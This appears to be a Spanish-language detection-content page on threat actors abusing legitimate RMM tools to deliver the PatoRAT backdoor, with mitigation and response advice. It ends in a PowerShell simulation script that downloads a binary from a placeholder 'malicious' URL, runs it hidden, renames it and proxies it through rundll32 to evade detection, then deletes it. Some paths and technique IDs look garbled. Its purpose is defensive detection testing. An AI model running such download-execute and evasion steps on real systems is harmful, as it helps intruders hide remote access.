Detección en el Endpoint de Casos Recientes de Distribución de RMM
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están abusando cada vez más de herramientas legítimas de monitoreo y gestión remota (RMM)—como LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne y SuperOps—para distribuir malware y establecer acceso remoto persistente. La entrega inicial a menudo ocurre a través de páginas de descarga maliciosas o correos electrónicos de phishing, seguida por la ejecución a través de PowerShell y el despliegue de cargas secundarias como el backdoor PatoRAT. AhnLab EDR puede detectar la ejecución de estas utilidades RMM y generar alertas basadas en comportamiento relacionadas con actividades sospechosas subsecuentes. El informe subraya la importancia de validar la procedencia del software y mantener un monitoreo continuo del endpoint.
Investigación
El Centro de Inteligencia de Seguridad de AhnLab observó múltiples campañas en las que atacantes reempaquetaban o disfrazaban instaladores RMM como aplicaciones populares (por ejemplo, Notepad++, 7-Zip y Telegram) y las distribuían a través de sitios web maliciosos o archivos adjuntos de phishing. Tras la instalación, los agentes RMM se registraban en la infraestructura del proveedor y se usaban para ejecutar cargas de PowerShell que desplegaban PatoRAT. Se observaron tácticas similares en varios productos RMM, incluyendo Syncro entregado a través de phishing con anzuelos en PDF. Se desarrolló una lógica de detección AhnLab EDR para marcar la ejecución de estos binarios legítimos y correlacionarla con comportamientos post-instalación.
Mitigación
Verifique las fuentes de descarga, valide los certificados de firma de código y compare los hashes con las versiones oficiales del proveedor antes de permitir software RMM en el entorno. Implemente listas blancas de aplicaciones y requiera aprobaciones explícitas para la ejecución de RMM. Monitorice lanzamientos inesperados de binarios RMM, actividad anómala de PowerShell y conexiones sospechosas a dominios de infraestructura del proveedor cuando tales herramientas no estén autorizadas. Mantenga los sistemas operativos y herramientas de seguridad actualizadas para reducir la exposición.
Respuesta
Cuando se detecte una ejecución sospechosa de RMM, aisle el host, recopile artefactos forenses y elimine el binario no autorizado. Bloquee las conexiones salientes a la infraestructura de la herramienta para cortar los canales de control remoto, y realice un escaneo completo para cargas secundarias como PatoRAT. Actualice el contenido de detección con los IOC observados e informe al SOC sobre los patrones de la campaña para una triaje más rápida.
Flujo de Ataque
Detecciones
Software Alternativo de Acceso / Gestión Remota (vía creation_proceso)
Ver
Posible Intento de Instalación de Software SuperOps RMM (vía event_archivo)
Ver
Software Alternativo de Acceso / Gestión Remota (vía auditoría)
Ver
Software Alternativo de Acceso / Gestión Remota (vía sistema)
Ver
Detección de la Explotación de Herramientas RMM para Distribución de Malware [Creación de Proceso de Windows]
Ver
Ejecución de Simulación
Prerequisito: El Chequeo Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente los TTPs identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.
-
Narrativa de Ataque y Comandos:
Un atacante entrega un correo electrónico de phishing que contiene un archivo adjunto malicioso. El archivo adjunto ejecuta un script de PowerShell que descarga el binario RMMLogMeIn.exetoC:Temp. Para evadir la detección basada en nombre, el atacante renombra el binario atool.exey lo lanza a través derundll32.exe(T1216). El binario RMM luego contacta al servidor C2 controlado por el atacante y despliega una carga de backdoor. Después de la ejecución, el atacante elimina el binario (T1542.004) para cubrir las pistas. -
Script de Prueba de Regresión:
# --------------------------------------------------------------- # Simular explotación de herramienta RMM (nombre original) – debería activar # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Ejecutando binario RMM original (se espera alerta)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simular evasión mediante el cambio de nombre y ejecución proxy – no debería activar # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Ejecutando binario RMM renombrado vía rundll32 (evasión)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Limpieza de artefactos # --------------------------------------------------------------- Write-Host "[*] Limpiando binarios..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulación completa." -
Comandos de Limpieza:
# Asegúrese de que cualquier proceso sobrante esté terminado Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Elimine cualquier archivo descargado (si todavía existe) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue